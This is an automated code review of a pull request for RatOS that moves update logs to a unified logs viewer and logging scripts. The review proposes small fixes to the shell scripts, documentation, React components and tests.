-if execute_with_logging "change_hostname" "HOSTNAME_CHANGE_FAILED" hostnamectl set-hostname "$NEW_HOSTNAME"; then
+if execute_with_logging "change_hostname" "HOSTNAME_CHANGE_FAILED" 10 hostnamectl set-hostname "$NEW_HOSTNAME"; then

23-26: Consistent error messaging

Prefix with “ERROR:” like other branches for consistency and easier parsing.

-    echo "Missing hostname parameter"
+    echo "ERROR: Missing hostname parameter"
LOGGING_SYSTEM.md (5)

126-131: Component names still use Update; rename to Logs**

Keep docs consistent with the rename (LogsViewer, LogsErrorBoundary, etc.).

- - `UpdateLogsViewer`: Main component for displaying logs
- - `UpdateLogsErrorBoundary`: Error boundary for graceful error handling
+ - `LogsViewer`: Main component for displaying logs
+ - `LogsErrorBoundary`: Error boundary for graceful error handling

64-64: Headings flagged by markdownlint (trailing colon)

Remove trailing colons to satisfy MD026.

-#### Commands:
+#### Commands
-#### Usage Examples:
+#### Usage Examples
-#### TRPC Endpoints (`src/server/routers/logs.ts`):
+#### TRPC Endpoints (`src/server/routers/logs.ts`)
-#### REST Endpoints:
+#### REST Endpoints

Also applies to: 93-93, 134-134, 142-142


245-249: Clear vs rotate inconsistency

Earlier you state logs.clear is disabled; advise rotation instead.

- - Manually clear logs using `ratos update-logs clear` (CLI) or web UI
- - Adjust `RATOS_LOG_MAX_SIZE` if needed
+ - Use `ratos logs rotate` to rotate logs (clearing is disabled)
+ - Adjust rotation settings via environment if needed

157-168: time field sample vs actual format

Sample shows ISO string; pino/unified scripts often emit epoch ms. Confirm and align docs (and types.ts).

-  "time": "2024-01-01T10:00:00.000Z",
+  "time": 1704103200000,

If ISO is intended, document the formatter and ensure server emits strings.

Also applies to: 170-179


272-275: ShellCheck targets

Update example to include current scripts (e.g., change-hostname.sh) and remove obsolete paths.

-shellcheck -ax -s bash configuration/scripts/ratos-update.sh
+shellcheck -ax -s bash src/scripts/change-hostname.sh
LOG_OPTIMIZATION.md (3)

27-27: Path still references update-logs router

Rename to logs.ts to match codebase.

-Created a new `unified` endpoint in `src/server/routers/update-logs.ts` that:
+Created a new `unified` endpoint in `src/server/routers/logs.ts` that:

58-71: Client paths still under update-logs

Update to logs path to reflect the rename.

-Created `useUnifiedLogData` hook in `src/app/update-logs/_components/use-unified-log-data.ts` that:
+Created `useUnifiedLogData` hook in `src/app/logs/_components/use-unified-log-data.ts` that:

175-183: Files list uses update-logs paths

Align with src/app/logs/_components/*.

-- `src/app/update-logs/_components/use-unified-log-data.ts`
-- `src/app/update-logs/_components/types.ts`
-- `src/app/update-logs/_components/log-summary-header.tsx`
-- `src/app/update-logs/_components/log-entry-component.tsx`
-- `src/app/update-logs/_components/log-faceted-filter.tsx`
-- `src/app/update-logs/_components/enhanced-log-level-selector.tsx`
-- `src/app/update-logs/_components/virtualized-log-list.tsx`
+- `src/app/logs/_components/use-unified-log-data.ts`
+- `src/app/logs/_components/types.ts`
+- `src/app/logs/_components/log-summary-header.tsx`
+- `src/app/logs/_components/log-entry-component.tsx`
+- `src/app/logs/_components/log-faceted-filter.tsx`
+- `src/app/logs/_components/enhanced-log-level-selector.tsx`
+- `src/app/logs/_components/virtualized-log-list.tsx`
src/server/routers/logs.ts (2)

43-63: Consider paginating summary data for scalability

The unified endpoint design is excellent for performance. However, when includeSummary is true, the entire log file is still parsed and kept in memory to generate the summary. For large log files, this could cause memory issues.

Consider implementing incremental summary generation that processes the file in chunks, similar to how readObjects works with streaming:

-// Generate summary from log entries
-export function generateSummary(entries: LogEntry[], logFileSize: number, logFileExists: boolean): LogSummary {
+// Generate summary by streaming through log file
+export async function generateSummaryStream(logPath: string, filter?: (entry: LogEntry) => boolean): Promise<LogSummary> {

375-385: Redundant sorting for already sorted data

The entries are already sorted chronologically in parseLogFile (line 89), so sorting them again here is unnecessary unless the sort direction is 'asc'.

-// Apply server-side sorting
-filteredEntries = filteredEntries.sort((a, b) => {
-  const timeA = new Date(a.time).getTime();
-  const timeB = new Date(b.time).getTime();
-
-  if (input.sortDirection === 'desc') {
-    return timeB - timeA; // newest first
-  } else {
-    return timeA - timeB; // oldest first
-  }
-});
+// Apply server-side sorting only if needed (already sorted asc from parseLogFile)
+if (input.sortDirection === 'desc') {
+  filteredEntries = filteredEntries.reverse();
+}

Also applies to: 415-424

src/app/logs/_components/log-entry-component.tsx (2)

19-20: Type assertion bypass for badge color

The as any type assertions bypass TypeScript's type checking for the badge color prop. This could hide type mismatches.

-const borderStyle = badgeBorderColorStyle({ color: level.badgeColor as any });
-const bgStyle = badgeBackgroundMutedColorStyle({ color: level.badgeColor as any });
+// Ensure badgeColor is typed correctly in LOG_LEVELS
+import { z } from 'zod';
+import { badgeColorOptions } from '@/components/common/badge';
+
+type BadgeColor = z.infer<typeof badgeColorOptions>;
+const borderStyle = badgeBorderColorStyle({ color: level.badgeColor as BadgeColor });
+const bgStyle = badgeBackgroundMutedColorStyle({ color: level.badgeColor as BadgeColor });

34-38: Context badge only shown with details enabled

The context badge is only shown when showDetails is true (line 34), but the source badge is always shown (line 39). This inconsistency might confuse users.

Consider showing both badges consistently, either always or both controlled by showDetails.

configuration/scripts/beacon-update.sh (1)

29-34: Consider setting exit_code consistently for all failures

While the script sets exit_code=1 when update_beacon_fw fails, the root permission check on line 20 directly exits with code 1. For consistency with the error accumulation pattern used throughout the PR, consider using the exit_code variable there as well.

Apply this diff for consistency:

 if [ "$EUID" -ne 0 ]; then
     echo "ERROR: Please run as root"
     log_error "Script must run as root but was executed by non-root user" "main" "ROOT_REQUIRED"
-    exit 1
+    exit_code=1
+    create_log_summary "beacon-update.sh" "$START_TIME"
+    log_script_complete "beacon-update.sh" "$exit_code"
+    exit "$exit_code"
 fi
src/app/logs/_components/enhanced-log-level-selector.tsx (2)

46-48: Consider handling edge cases more explicitly

The fallback to level 3 (which doesn't exist in LOG_LEVELS) when selectedValue is undefined could cause issues. Consider using a valid default level.

Apply this diff to use a valid default:

 const selectedValue = logLevelOptions.find((option) => option.value === logLevel);
-const levelConfig = LOG_LEVELS[selectedValue?.level ?? 3];
-const count = getCountForLevel(selectedValue?.level ?? 3);
+const levelConfig = LOG_LEVELS[selectedValue?.level ?? 30]; // Default to INFO level
+const count = getCountForLevel(selectedValue?.level ?? 30);

60-62: Type assertion for Badge color prop should be avoided

Using as any type assertion bypasses TypeScript's type checking. Consider defining a proper type mapping.

Since the Badge component accepts specific color values, create a type-safe mapping:

+// Add this type mapping at the top of the component
+const COLOR_MAP: Record<string, Parameters<typeof Badge>[0]['color']> = {
+  gray: 'gray',
+  green: 'green', 
+  sky: 'sky',
+  yellow: 'yellow',
+  red: 'red',
+  purple: 'purple'
+};

 // Then use it in the Badge components:
-<Badge color={levelConfig.badgeColor as any} size="sm">
+<Badge color={COLOR_MAP[levelConfig.badgeColor] || 'gray'} size="sm">

Also applies to: 85-88

configuration/scripts/klipper-mcu-update.sh (1)

17-21: Consider consistent error handling pattern

Similar to beacon-update.sh, this script directly exits on root check failure instead of using the exit_code accumulation pattern.

For consistency with the error accumulation pattern:

 if [ "$EUID" -ne 0 ]; then
     echo "ERROR: This script should be run as root"
     log_error "Script must run as root but was executed by non-root user" "main" "ROOT_REQUIRED"
-    exit 1
+    exit_code=1
+    create_log_summary "klipper-mcu-update.sh" "$START_TIME"
+    log_script_complete "klipper-mcu-update.sh" "$exit_code"
+    exit "$exit_code"
 fi
configuration/scripts/ratos-install.sh (1)

81-81: verify_ready exits directly on root check

The verify_ready function calls exit 1 directly when run as root (line 64), which could bypass the error accumulation. Consider returning an error code instead.

Modify verify_ready to return an error instead of exiting:

 verify_ready()
 {
     log_info "Verifying script execution requirements" "verify_ready"
     if [ "$EUID" -eq 0 ]; then
         echo "This script must not run as root"
         log_error "Script attempted to run as root" "verify_ready" "ROOT_EXECUTION_DENIED"
-        exit 1
+        return 1
     fi
     log_info "Script execution requirements verified" "verify_ready"
+    return 0
 }
src/scripts/update.sh (1)

16-20: Direct exit in verify_ready should be reconsidered

The verify_ready function exits directly when not run as root, which bypasses the error accumulation pattern used elsewhere in the script.

Consider returning an error code instead:

 verify_ready()
 {
     log_info "Verifying script execution requirements" "verify_ready"
     if [ ! "$EUID" -eq 0 ]; then
         echo "This script must run as root"
         log_error "Script must run as root but was executed by non-root user" "verify_ready" "ROOT_REQUIRED"
-        exit 1
+        return 1
     fi
     log_info "Script execution requirements verified" "verify_ready"
+    return 0
 }
src/app/logs/_components/logs-viewer.tsx (1)

121-139: Good prop drilling but consider using context for deeply nested state

The component passes 13+ props to VirtualizedLogList. While this works, consider using React Context for filter state management to reduce prop drilling in future iterations.

For future consideration, a FilterContext could simplify state management:

// Example structure (not for immediate implementation)
const FilterContext = React.createContext<{
  logLevel: string;
  setLogLevel: (level: string) => void;
  // ... other filter states
}>({...});

// Usage in components would be cleaner:
const { logLevel, setLogLevel } = useContext(FilterContext);
scripts/test-logging-integration.sh (3)

8-11: Make BASE_DIR resolution portable (fallback if realpath is missing).

realpath isn’t available on all systems. Provide a readlink -f fallback to avoid failures on minimal/macOS environments.

Apply:

-BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+if command -v realpath >/dev/null 2>&1; then
+  BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+else
+  BASE_DIR="$(cd "$SCRIPT_DIR/.." && pwd -P)"
+fi

62-70: Don’t suppress source errors.

2>/dev/null hides why sourcing failed, making failures harder to diagnose. Drop the redirection or print the error path on failure.

-if source "$BASE_DIR/configuration/scripts/ratos-common.sh" 2>/dev/null; then
+if source "$BASE_DIR/configuration/scripts/ratos-common.sh"; then

36-46: Harden test harness flags.

Use set -Euo pipefail and trap EXIT to ensure cleanup even on abrupt errors.

-set -eo pipefail
+set -Euo pipefail
+trap 'rm -f "$TEST_LOG_FILE"' EXIT
src/app/logs/_components/log-faceted-filter.tsx (3)

41-46: Accessibility: add an accessible name to the trigger.

The button shows only an icon plus title; when title is short/non-descriptive, screen readers benefit from aria-label.

-<Button
+<Button
   variant="outline"
   size="default"
   className={`flex h-9 border-dashed ${disabled ? 'cursor-not-allowed opacity-50' : ''}`}
   disabled={disabled}
+  aria-label={`${title} filter`}
 >

88-91: Ensure checkbox toggles independently.

Relying on CommandItem onSelect works, but clicking the Checkbox itself won’t toggle without a handler. Wire onCheckedChange for direct toggling.

-<Checkbox checked={isSelected} />
+<Checkbox
+  checked={isSelected}
+  onCheckedChange={() => {
+    const newSelection = isSelected
+      ? selectedValues.filter((v) => v !== option)
+      : [...selectedValues, option];
+    onSelectionChange(newSelection);
+  }}
+/>

33-33: Micro‑perf: memoize selectedSet.

Avoid rebuilding Set on every render for large option lists.

-const selectedSet = new Set(selectedValues);
+const selectedSet = React.useMemo(() => new Set(selectedValues), [selectedValues]);
src/scripts/setup.sh (2)

28-34: Bound long-running npx with a timeout.

Network hiccups can stall the setup; execute_with_logging supports numeric timeout as first arg.

-if execute_with_logging "disable_telemetry" "TELEMETRY_DISABLE_FAILED" npx --yes -- next@13 telemetry disable; then
+if execute_with_logging "disable_telemetry" "TELEMETRY_DISABLE_FAILED" 60 npx --yes -- next@13 telemetry disable; then

64-73: Log summary likely counts nothing (filters on source="ratos-update").

create_log_summary filters by "ratos-update", but this script logs with contexts like main/script_lifecycle. Update the library to accept a source/context filter or provide a variant for per-script summaries; otherwise the summary will show zeros.

Would you like a follow-up PR to add a create_log_summary_for_source helper and switch this call accordingly?

scripts/test-complete-logging-system.sh (2)

8-11: Same portability nit: avoid hard dependency on realpath.

-BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+if command -v realpath >/dev/null 2>&1; then
+  BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+else
+  BASE_DIR="$(cd "$SCRIPT_DIR/.." && pwd -P)"
+fi

6-6: Harden shell flags and ensure cleanup.

-set -eo pipefail
+set -Euo pipefail
+trap 'rm -f "$TEST_LOG_FILE" "$TEST_CONFIG_FILE"' EXIT
src/app/logs/_components/virtualized-log-list.tsx (3)

81-87: Label htmlFor has no matching control id.

The EnhancedLogLevelSelector doesn’t expose an input with id="log-level". Either add an id to its trigger or drop htmlFor to avoid an invalid association.

-<Label htmlFor="log-level" className={showOnlyErrors ? 'text-muted-foreground' : ''}>
+<Label className={showOnlyErrors ? 'text-muted-foreground' : ''}>
   Log Level
 </Label>

116-122: Don’t assume error has .message.

Type error as unknown and render safely to avoid runtime errors.

- error: any;
+ error: unknown;

And when rendering:

-<ErrorMessage title="Failed to load log entries">{error.message}</ErrorMessage>
+<ErrorMessage title="Failed to load log entries">
+  {error instanceof Error ? error.message : String(error)}
+</ErrorMessage>

54-61: Virtualizer margins based on refs may be stale.

scrollMargin/paddingEnd read null on first render and won’t update. Consider using a stateful value updated in a layout effect when containerRef mounts, then pass to useWindowVirtualizer.

I can provide a small refactor if you’d like.

src/__tests__/update-logs.test.ts (1)

81-100: Fix mixed async/await patterns in test.

The test uses async but doesn't await the promise returned by writeFile. This could lead to race conditions.

Apply this diff to ensure proper async handling:

-it('should skip invalid JSON lines and include all sources', async () => {
+it('should skip invalid JSON lines and include all sources', async () => {
 	const logContent = [
 		`{"level":30,"time":${new Date('2024-01-01T10:00:00.000Z').getTime()},"msg":"Valid entry","source":"ratos-update"}`,
 		'Invalid JSON line',
 		`{"level":50,"time":${new Date('2024-01-01T10:01:00.000Z').getTime()},"msg":"Another valid entry","source":"ratos-update"}`,
 		`{"level":30,"time":${new Date('2024-01-01T10:02:00.000Z').getTime()},"msg":"Different source","source":"other-service"}`,
 		`{"level":30,"time":${new Date('2024-01-01T10:03:00.000Z').getTime()},"msg":"Server entry"}`,
 	].join('\n');
 
 	await writeFile(TEST_LOG_FILE, logContent);
 
 	const parsedEntries = await parseLogFile(TEST_LOG_FILE);
 
 	expect(parsedEntries).toHaveLength(4); // All valid entries including different sources
 	expect(parsedEntries[0]?.msg).toBe('Valid entry');
 	expect(parsedEntries[1]?.msg).toBe('Another valid entry');
 	expect(parsedEntries[2]?.msg).toBe('Different source');
 	expect(parsedEntries[3]?.msg).toBe('Server entry');
 	expect(parsedEntries[3]?.source).toBe('server'); // Default source for entries without source
 });
src/app/logs/_components/log-summary-header.tsx (1)

90-100: Consider feature flag instead of NODE_ENV check.

Using process.env.NODE_ENV === 'development' for the test data generator could accidentally expose this feature if environment variables are misconfigured.

Consider using a more explicit feature flag:

-{process.env.NODE_ENV === 'development' && (
+{process.env.NEXT_PUBLIC_ENABLE_TEST_DATA_GENERATOR === 'true' && (
   <Button
     variant="outline"
     size="default"
     onClick={() => generateMockDataMutation.mutate()}
     disabled={generateMockDataMutation.isLoading}
   >
     <FileText className="h-4 w-4" />
     Generate Test Data
   </Button>
 )}
configuration/scripts/ratos-log-rotation.sh (2)

253-267: Consider making the systemd service name configurable.

The logrotate configuration is hardcoded to reload ratos-configurator. Consider making this configurable for flexibility.

 create_logrotate_config() {
     local log_file="$1"
     local config_file="/etc/logrotate.d/ratos-logging"
     local max_size="${2:-$DEFAULT_MAX_SIZE}"
     local backup_count="${3:-$DEFAULT_BACKUP_COUNT}"
     local compress="${4:-$DEFAULT_COMPRESS}"
+    local service_name="${5:-ratos-configurator}"
     
     echo "Creating logrotate configuration for $log_file"
     
     # Create logrotate configuration
     cat > "/tmp/ratos-logrotate.conf" << EOF
 $log_file {
     size $max_size
     rotate $backup_count
     missingok
     notifempty
     create 664 root root
     $([ "$compress" == "true" ] && echo "compress")
     $([ "$compress" == "true" ] && echo "delaycompress")
     postrotate
         # Signal processes to reopen log files if needed
-        systemctl reload-or-restart ratos-configurator 2>/dev/null || true
+        systemctl reload-or-restart $service_name 2>/dev/null || true
     endscript
 }
 EOF

275-279: Consider more verbose debug output for troubleshooting.

The logrotate validation redirects all output to /dev/null. Consider capturing and logging errors for troubleshooting.

 # Test the configuration
-if sudo logrotate -d "$config_file" >/dev/null 2>&1; then
+if output=$(sudo logrotate -d "$config_file" 2>&1); then
     echo "Logrotate configuration is valid"
 else
     echo "WARNING: Logrotate configuration may have issues" >&2
+    echo "Debug output: $output" >&2
 fi
src/scripts/common.sh (4)

113-120: Order systemd operations: daemon-reload before enable.

Enabling a brand-new unit before daemon-reload can fail on some systems. Swap the calls.

-            if execute_with_logging "install_or_update_service_file" "SERVICE_INSTALL_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
-                if execute_with_logging "install_or_update_service_file" "SERVICE_ENABLE_FAILED" sudo systemctl enable ratos-configurator.service; then
-                    if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
+            if execute_with_logging "install_or_update_service_file" "SERVICE_INSTALL_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
+                if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
+                    if execute_with_logging "install_or_update_service_file" "SERVICE_ENABLE_FAILED" sudo systemctl enable ratos-configurator.service; then

162-166: Prefer command -v over which.

command -v pnpm is POSIX-y and doesn’t produce extraneous output; which can be a shell function/alias.

-    if ! which pnpm &> /dev/null; then
+    if ! command -v pnpm &> /dev/null; then

218-218: Typo in user-facing status.

“Updatin” → “Updating”.

-        report_status "Updatin moonraker service permissions"
+        report_status "Updating moonraker service permissions"

380-392: Fix tmp filename mismatch; remove stray unused file.

You touch 030 but write/chown/cp 031, leaving an unused /tmp/030-... file.

-    touch /tmp/030-ratos-configurator-scripts
-    cat << __EOF > /tmp/031-ratos-configurator-scripts
+    touch /tmp/031-ratos-configurator-scripts
+    cat << __EOF > /tmp/031-ratos-configurator-scripts
configuration/scripts/ratos-logging-config.sh (1)

14-25: Quote default path value in associative array.

Guard against spaces in paths.

-    ["log_file"]=$RATOS_LOG_FILE
+    ["log_file"]="$RATOS_LOG_FILE"
configuration/scripts/ratos-logging.sh (3)

312-320: Avoid unconditional DEBUG echo during log-file creation.

Printing to stdout here can pollute callers’ output. Use log_debug or silence.

-    if [[ ! -f "$RATOS_LOG_FILE" ]]; then
-        echo "DEBUG: Log file $RATOS_LOG_FILE does not exist, creating it..."
+    if [[ ! -f "$RATOS_LOG_FILE" ]]; then
+        [[ "${RATOS_LOG_LEVEL}" == "debug" || "${RATOS_LOG_LEVEL}" == "trace" ]] && \
+          log_debug "Log file $RATOS_LOG_FILE does not exist, creating it..." "logging"

438-443: Align console colors with new scheme (INFO sky, DEBUG pink).

Matches PR’s updated level colors.

-        "info")
-            echo -e "\033[32m[$timestamp] INFO: $message\033[0m"
+        "info")
+            echo -e "\033[36m[$timestamp] INFO: $message\033[0m"
             ;;
         "debug")
-            if [[ $RATOS_LOG_LEVEL == "debug" || $RATOS_LOG_LEVEL == "trace" ]]; then
-                echo -e "\033[36m[$timestamp] DEBUG: $message\033[0m"
+            if [[ $RATOS_LOG_LEVEL == "debug" || $RATOS_LOG_LEVEL == "trace" ]]; then
+                echo -e "\033[35m[$timestamp] DEBUG: $message\033[0m"
             fi
             ;;
         "trace")
             if [[ $RATOS_LOG_LEVEL == "trace" ]]; then
-                echo -e "\033[35m[$timestamp] TRACE: $message\033[0m"
+                echo -e "\033[90m[$timestamp] TRACE: $message\033[0m"
             fi

Also applies to: 446-448


333-352: Consider non-zero returns on misuse of log_message.

Returning 0 on invalid inputs hides call-site bugs. If set -e is a concern, call-sites can append || true.

📜 Review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 41e45e2 and cae6bbb.

📒 Files selected for processing (45)
  • .vscode/settings.json (1 hunks)
  • LOGGING_SYSTEM.md (3 hunks)
  • LOG_OPTIMIZATION.md (1 hunks)
  • configuration/scripts/beacon-update.sh (1 hunks)
  • configuration/scripts/environment.sh (1 hunks)
  • configuration/scripts/klipper-mcu-update.sh (1 hunks)
  • configuration/scripts/moonraker-update.sh (1 hunks)
  • configuration/scripts/ratos-common.sh (5 hunks)
  • configuration/scripts/ratos-install.sh (1 hunks)
  • configuration/scripts/ratos-log-rotation.sh (1 hunks)
  • configuration/scripts/ratos-logging-config.sh (1 hunks)
  • configuration/scripts/ratos-logging.sh (7 hunks)
  • docs/logging-system.md (1 hunks)
  • scripts/generate-devbox-environment.sh (2 hunks)
  • scripts/test-complete-logging-system.sh (1 hunks)
  • scripts/test-logging-integration.sh (1 hunks)
  • src/__tests__/update-logs.test.ts (6 hunks)
  • src/app/_hooks/navigation.ts (1 hunks)
  • src/app/logs/_components/enhanced-log-level-selector.tsx (1 hunks)
  • src/app/logs/_components/log-entry-component.tsx (1 hunks)
  • src/app/logs/_components/log-faceted-filter.tsx (1 hunks)
  • src/app/logs/_components/log-summary-header.tsx (1 hunks)
  • src/app/logs/_components/logs-error-boundary.tsx (4 hunks)
  • src/app/logs/_components/logs-viewer.tsx (1 hunks)
  • src/app/logs/_components/types.ts (1 hunks)
  • src/app/logs/_components/use-unified-log-data.ts (1 hunks)
  • src/app/logs/_components/virtualized-log-list.tsx (1 hunks)
  • src/app/logs/page.tsx (1 hunks)
  • src/app/update-logs/_components/update-logs-viewer.tsx (0 hunks)
  • src/app/update-logs/page.tsx (0 hunks)
  • src/cli/commands.tsx (2 hunks)
  • src/cli/commands/logs.tsx (4 hunks)
  • src/components/common/badge.tsx (1 hunks)
  • src/components/common/button.tsx (1 hunks)
  • src/components/ui/select.tsx (2 hunks)
  • src/scripts/README-mock-logs.md (1 hunks)
  • src/scripts/change-hostname.sh (1 hunks)
  • src/scripts/common.sh (1 hunks)
  • src/scripts/generate-mock-logs.js (1 hunks)
  • src/scripts/generate-mock-update-logs.ts (1 hunks)
  • src/scripts/setup.sh (1 hunks)
  • src/scripts/update.sh (1 hunks)
  • src/server/routers/index.ts (2 hunks)
  • src/server/routers/logs.ts (4 hunks)
  • src/tailwind.config.ts (1 hunks)
💤 Files with no reviewable changes (2)
  • src/app/update-logs/page.tsx
  • src/app/update-logs/_components/update-logs-viewer.tsx
🧰 Additional context used
🧬 Code graph analysis (26)
src/app/logs/_components/log-entry-component.tsx (2)
src/app/logs/_components/types.ts (2)
  • LogEntry (4-13)
  • LOG_LEVELS (30-82)
src/components/common/badge.tsx (3)
  • badgeBorderColorStyle (84-103)
  • badgeBackgroundMutedColorStyle (63-82)
  • Badge (197-204)
src/app/logs/_components/use-unified-log-data.ts (1)
src/app/logs/_components/types.ts (2)
  • LogSummary (15-28)
  • LogEntry (4-13)
src/scripts/update.sh (2)
configuration/scripts/ratos-logging.sh (9)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • log_info (456-456)
  • log_error (458-458)
  • execute_with_logging (464-616)
  • log_warn (457-457)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
src/scripts/common.sh (4)
  • report_status (15-22)
  • verify_users (311-317)
  • ensure_pnpm_installation (205-213)
  • pnpm_install (141-203)
src/scripts/setup.sh (2)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • log_info (456-456)
  • log_error (458-458)
  • execute_with_logging (464-616)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
src/scripts/common.sh (10)
  • verify_users (311-317)
  • install_hooks (224-232)
  • ensure_sudo_command_whitelisting (352-412)
  • ensure_pnpm_installation (205-213)
  • install_logrotation (234-261)
  • pnpm_install (141-203)
  • install_udev_rule (319-350)
  • install_cli (294-309)
  • symlink_configuration (275-292)
  • install_or_update_service_file (42-139)
configuration/scripts/ratos-install.sh (2)
configuration/scripts/ratos-logging.sh (7)
  • log_script_start (652-662)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • log_error (458-458)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/ratos-common.sh (5)
  • report_status (12-16)
  • install_beacon (74-116)
  • install_hooks (147-217)
  • ensure_sudo_command_whitelisting (276-327)
  • verify_registered_extensions (329-491)
src/scripts/change-hostname.sh (1)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_error (458-458)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/ratos-common.sh (2)
configuration/scripts/ratos-logging.sh (6)
  • setup_error_trap (619-627)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • log_error (458-458)
  • log_warn (457-457)
  • log_debug (455-455)
src/scripts/common.sh (1)
  • report_status (15-22)
src/scripts/common.sh (2)
configuration/scripts/ratos-logging.sh (3)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • log_error (458-458)
configuration/scripts/ratos-common.sh (1)
  • report_status (12-16)
configuration/scripts/klipper-mcu-update.sh (1)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_error (458-458)
  • log_info (456-456)
  • execute_with_logging (464-616)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
src/app/logs/page.tsx (2)
src/app/logs/_components/logs-error-boundary.tsx (1)
  • LogsErrorBoundary (60-82)
src/app/logs/_components/logs-viewer.tsx (1)
  • LogsViewer (20-145)
src/app/logs/_components/virtualized-log-list.tsx (6)
src/app/logs/_components/types.ts (2)
  • LogEntry (4-13)
  • LogSummary (15-28)
src/app/logs/_components/enhanced-log-level-selector.tsx (1)
  • EnhancedLogLevelSelector (12-96)
src/app/logs/_components/log-faceted-filter.tsx (1)
  • LogFacetedFilter (26-112)
src/components/common/spinner.tsx (1)
  • Spinner (3-35)
src/components/common/error-message.tsx (1)
  • ErrorMessage (11-22)
src/app/logs/_components/log-entry-component.tsx (1)
  • LogEntryComponent (11-62)
src/app/logs/_components/logs-viewer.tsx (4)
src/app/logs/_components/use-unified-log-data.ts (1)
  • useUnifiedLogData (40-134)
src/components/common/error-message.tsx (1)
  • ErrorMessage (11-22)
src/app/logs/_components/log-summary-header.tsx (1)
  • LogSummaryHeader (31-240)
src/app/logs/_components/virtualized-log-list.tsx (1)
  • VirtualizedLogList (32-185)
configuration/scripts/moonraker-update.sh (4)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_info (456-456)
  • log_error (458-458)
  • execute_with_logging (464-616)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/moonraker-ensure-policykit-rules.sh (1)
  • ensure_moonraker_policiykit_rules (11-45)
configuration/scripts/ratos-common.sh (1)
  • ensure_service_permission (219-246)
src/scripts/common.sh (1)
  • ensure_service_permission (215-222)
src/app/logs/_components/log-summary-header.tsx (7)
src/app/logs/_components/types.ts (1)
  • LogSummary (15-28)
src/components/common/spinner.tsx (1)
  • Spinner (3-35)
src/components/common/button.tsx (1)
  • Button (118-205)
src/helpers/util.ts (1)
  • formatBytes (9-15)
src/components/common/badge.tsx (1)
  • Badge (197-204)
src/components/common/modal.tsx (1)
  • Modal (94-239)
src/components/common/animated-container.tsx (1)
  • AnimatedContainer (7-54)
src/app/logs/_components/log-faceted-filter.tsx (2)
src/components/common/button.tsx (1)
  • Button (118-205)
src/components/common/badge.tsx (1)
  • Badge (197-204)
scripts/test-logging-integration.sh (4)
scripts/test-complete-logging-system.sh (4)
  • test_log_section (51-53)
  • test_log_pass (36-39)
  • test_log_fail (41-45)
  • main (362-393)
configuration/scripts/ratos-common.sh (1)
  • report_status (12-16)
src/scripts/common.sh (1)
  • report_status (15-22)
configuration/scripts/ratos-logging.sh (1)
  • execute_with_logging (464-616)
scripts/test-complete-logging-system.sh (4)
scripts/test-logging-integration.sh (3)
  • test_log_section (51-53)
  • test_log_pass (36-39)
  • test_log_fail (41-45)
configuration/scripts/ratos-logging.sh (17)
  • log_trace (454-454)
  • log_debug (455-455)
  • log_info (456-456)
  • log_warn (457-457)
  • log_error (458-458)
  • start_timer (120-134)
  • stop_timer (137-172)
  • increment_counter (175-196)
  • get_counter (199-202)
  • log_performance_summary (222-251)
  • execute_with_logging (464-616)
  • check_system_resources (697-749)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • log_script_complete (665-674)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
configuration/scripts/ratos-logging-config.sh (4)
  • create_default_config (28-71)
  • load_logging_config (74-95)
  • update_config (182-211)
  • validate_config (98-143)
configuration/scripts/ratos-log-rotation.sh (2)
  • get_file_size (40-47)
  • rotate_log_file (89-154)
src/cli/commands.tsx (2)
src/cli/commands/logs.tsx (1)
  • addLogCommands (252-378)
src/cli/util.tsx (1)
  • log (221-226)
src/app/logs/_components/enhanced-log-level-selector.tsx (2)
src/app/logs/_components/types.ts (2)
  • LogSummary (15-28)
  • LOG_LEVELS (30-82)
src/components/common/badge.tsx (1)
  • Badge (197-204)
src/__tests__/update-logs.test.ts (1)
src/server/routers/logs.ts (4)
  • parseLogFile (79-97)
  • filterBySource (189-194)
  • generateSummary (100-173)
  • filterBySeverity (176-178)
src/server/routers/index.ts (1)
src/server/routers/logs.ts (1)
  • logsRouter (202-444)
configuration/scripts/ratos-logging.sh (2)
configuration/scripts/ratos-logging-config.sh (1)
  • init_logging_config (214-240)
configuration/scripts/ratos-log-rotation.sh (1)
  • rotate_log_file (89-154)
src/server/routers/logs.ts (4)
src/scripts/generate-mock-logs.js (3)
  • logPath (191-191)
  • entries (120-120)
  • entries (201-201)
src/app/logs/_components/types.ts (2)
  • LogEntry (4-13)
  • LogSummary (15-28)
src/server/helpers/ndjson.ts (1)
  • readObjects (552-649)
src/scripts/generate-mock-update-logs.ts (1)
  • generateMockLogs (270-270)
src/app/logs/_components/logs-error-boundary.tsx (2)
src/app/error.tsx (1)
  • Error (16-83)
src/components/common/error-message.tsx (1)
  • ErrorMessage (11-22)
src/app/logs/_components/types.ts (2)
